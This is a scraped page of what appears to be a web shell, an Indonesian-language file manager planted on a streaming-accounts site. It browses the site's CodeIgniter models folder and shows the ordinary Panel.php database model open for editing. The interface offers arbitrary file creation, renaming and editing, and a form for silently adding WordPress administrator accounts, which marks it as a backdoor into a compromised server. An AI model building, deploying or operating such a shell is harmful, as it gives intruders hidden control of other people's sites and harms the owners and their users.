📝 File Editor (IP: )
📂 Root Folder:
🔍 Buka
📁 Daftar isi: /home/goblinst/public_html/cuentas.goblinstreaming21.com/application/models
⬅️ Kembali ke folder sebelumnya
📄
Cliente.php
📄
Configuracion.php
📄
Panel.php
📄
Perfil.php
📄
Producto.php
📄
Servicio.php
📄
Usuario.php
📄
Venta.php
📄
index.html
📁 Folder Baru:
+ Buat
📄 File Baru:
+ Buat
✏️ Rename:
Cliente.php
Configuracion.php
Panel.php
Perfil.php
Producto.php
Servicio.php
Usuario.php
Venta.php
index.html
➡️
Rename
➕ Tambah User WordPress (folder aktif)
👤 Username:
📧 Email:
🔒 Password:
➕ Buat User WP (admin)
📝 Mengedit: Panel.php
<?php class Panel extends CI_Model { public function insertar($datosMoneda) { return $this->db->insert('configuracion', $datosMoneda); } public function eliminar() { return $this->db->truncate('configuracion'); } public function obtenerTodos() { $query = $this->db->get('configuracion'); if ($query->num_rows() > 0) { return $query->row(); } else { return false; } } }
💾 Simpan
🔁 Replace Teks (Ctrl+H)
Cari:
Ganti Dengan:
Replace All
Tutup